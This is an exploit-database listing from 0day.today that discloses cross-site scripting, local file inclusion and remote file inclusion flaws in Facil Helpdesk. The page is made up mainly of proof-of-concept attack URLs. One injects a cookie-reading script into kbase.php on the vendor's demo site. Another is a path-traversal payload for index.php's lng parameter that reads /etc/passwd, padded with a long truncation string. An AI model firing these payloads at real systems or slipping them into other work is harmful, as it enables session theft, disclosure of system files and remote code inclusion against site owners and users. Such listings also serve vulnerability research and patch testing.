[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Facil Helpdesk (RFI/LFI/XSS) Multiples Remote Vulnerabilities

Author
Moudi
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-5632
Category
web applications
Date add
06-08-2009
Platform
unsorted
=============================================================
Facil Helpdesk (RFI/LFI/XSS) Multiples Remote Vulnerabilities
=============================================================



/*


Facil Helpdesk (RFI/LFI/XSS) Multiples Vulnerabilities

Discovered By : Moudi
Download : http://www.cromosoft.com/en/facilhelpdesk.html

Greetings : Mizoz, Zuka, 599eme Man.

*/

[+] Exploit XSS:

- Vulnerable code in kbase.php (/).

- Poc:
  http://127.0.0.1/kbase.php/[XSS]
  http://www.demo.cromosoft.com/helpdesk/kbase/kbase.php/"><script>alert(document.cookie);</script>

[+] Exploit LFI:

- Vulnerable code in index.php (lng).

- Poc:
  http://127.0.0.1/index.php?lng=[LFI]
  http://www.demo.cromosoft.com/helpdesk/index.php?lng=[LFI]

LFI => invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

[+] Exploit RFI:

- Vulnerable code in index.php (lng).

- Poc:
  http://127.0.0.1/index.php?lng=[RFI]




#  0day.today [2024-11-16]  #